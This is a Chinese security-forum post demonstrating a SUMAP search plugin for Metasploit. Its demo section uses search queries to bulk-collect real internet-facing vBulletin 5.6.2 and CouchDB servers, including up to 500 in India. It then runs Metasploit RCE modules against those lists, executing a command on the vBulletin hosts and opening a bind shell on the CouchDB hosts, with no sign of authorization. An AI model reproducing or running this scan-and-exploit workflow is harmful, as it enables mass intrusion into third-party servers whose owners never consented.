[原创]SUMAP联动MSF-企业安全-看雪-安全社区|安全招聘|kanxue.com

[原创]SUMAP联动MSF

2021-9-2 17:10 7323

[原创]SUMAP联动MSF

zizixixi

2021-9-2 17:10

7323

0x00 前言

前几天安恒SUMAP团队更新了新版的SDK3.0版本，附带了许多新功能以及新数据类型，BS的搜索语法可以在共用在SDK实现同一套查询语法。本次测试主要围绕sumap sdk 3.0的 MSF 联动 功能。

0x01 安装

1. 运行安装脚本

本次测试以为kali Linux为基础测试，解压sumap msf联动插件，目录有两个PY脚本文件：

1 2	`├── setup.py` `└── sumap_search.py`

setup.py是安装sumap MSF联动插件安装脚本，sumap_search.py功能插件。setup.py接受一个参数，参数是metasploit-framework所在目录。

1 2	`1.` `kali默认msf路径/usr/share` `2.` `如果msf是自定义安装，那么使用自定义安装目录`

注意：kali原生的msf使用 python3 setup.py /usr/share/ 安装

1	`python3 setup.py` `/opt`

界面返回："module sumap_search installed susccessfully"，插件已经安装成功。

setup.py会自动将功能插件复制到~/.msf4/modules/auxiliary/gather，为了确保正确安装，查看是否出现：

2. 设置SDK token

1 2	`export SUMAPTOKEN=xxxxx` `export SUMAPHOSTID=xxx`

3. 测试安装是否成功

0x02 查询技巧

SUMAP MSF联动插件具体有以下3个字段：

query：查询数据
file：为空即屏幕输出，否则保存到文件
size：设置最大拖取数据

1. 通过tags查询巴西地区Docker的Harbor资产数据

set query "tags:"harbor"&&country:"BR""
set file ''
set size 3

2. 通过icon图标查询巴西地区Docker的Harbor资产数据

将harbor的ico进行hash计算后的结果传入查询

set query "icohash:"-510172706"&&country:"BR""
set file ''
set size 3

3. 高级与或非组合语法查询巴西地区Docker的Harbor资产数据

更新后的CS端支持高级查询方式，具体语法如下：

可以使用 && || ! 符号，如：  
1、domain:"aaa.com"&&!domain:"bbb.com"          
2、hostname:"powered by"||!hostname:"discuz"            
3、!ip:"0.0.0.0/0"&&!port:80&&!port:90||title:"xxxx"    
4、country:"巴西"&&ipv:"6"&&!port:"80"&&http_status:200&&!port:90||title:"xxxx"     

例如，想要查询带有ico图标并且开在443端口的Harbor数据

set query "tags:"harbor"&&port:443&&icohash:"-510172706"&&country:"BR""
set file ''
set size 3

4. 一些需要避过的坑

由于MSF框架的JSON实现有bug：Encoding::UndefinedConversionError "\xE4" from ASCII-8BIT to UTF-8，所以在输入中文查询时会出现错误：

这个bug，我们在测试时已提交给MSF官方了。所以我们在查询国别等带有中文字符时，可以用国家缩写代替，比如“瑞典”可以替换为"SE"：

0x03 联动demo测试

联动测试论坛系统vBulletin

vBulletin是一个国外非常火热的论坛系统。在2020年时vBulletin5.6.2爆出了非常严重的无条件RCE漏洞：CVE-2019-16759绕过。其widget_tabbedContainer_tab_panel组件存在模板注入，攻击者可以轻易的通过命令注入获得系统权限。

漏洞详细可参考 https://www.1337pwn.com/how-to-hack-vbulletin-5-6-0-5-6-2-using-zero-day-rce-exploit/

1. 通过sumap_search 批量导出数据

首先去SUMAP上查询数据量
设置查询语法

1
2
3
4
set query "data:"vBulletin 5.6.2"&&!data:"UPnP/1.0""
set file vbullentin.txt
set size 47
run

2. 加载vBulletin的漏洞模块

加载vBulletin RCE

1
2
3
4
5
1. 搜索vuBulletin相关漏洞
search vbulletin

2. 选中第四个
use 4

设置漏洞模块载荷

1. 设置stage类型, 1. 表示Unix命令执行
    set target 1
 
2. 设置目标主机
    set RHOSTS file:vbullentin.txt
 
3. 设置端口，这里我们设置为443
    set RPORT 443
 
4. 设置https交互
    set SSL true
 
5. 设置执行的命令
        set CMD id

开始测试：run
查看测试成功的结果：

由于我们选择的是命令执行，不会建立session会话，所以直接在测试界面查看结果：

数据库CouchDB漏洞测试

CouchDB是Apache基金会开源的NoSQL数据库，专注于易用性。CouchDB一般开在5984端口，在CouchDB\<2.1.0版本存在Post-Auth RCE漏洞。在未设置登录或弱口令密码情况下，可通过json进行远程代码执行。

漏洞详情可参考https://www.exploit-db.com/exploits/44913

1. 通过sumap_search tags高级组合搜索语法

首先可以在SUMAP b/s测试搜索语句以及资产数量

设置查询语法

1
2
3
set query "tags:\"couchdb\"&&!data:\"UPnP/1.0\"&&port:5984&&country:\"IN\""
set file couchdb-in.txt
set size 500

2. 加载couchdb漏洞模块

加载apache_couchdb_cmd_exec

1
use exploit/linux/http/apache_couchdb_cmd_exec
设置漏洞载荷

1
2
3
4
5
6
7
8
1. 设置目标IP
    set RHOSTS file:couchdb-in.txt

2. 设置目标端口
    set RPORT 5984

3. 设置payload载荷
        set payload payload/generic/shell_bind_tcp
开始测试：run
查看结果：sessions

执行命令：sessions -i 1进入shell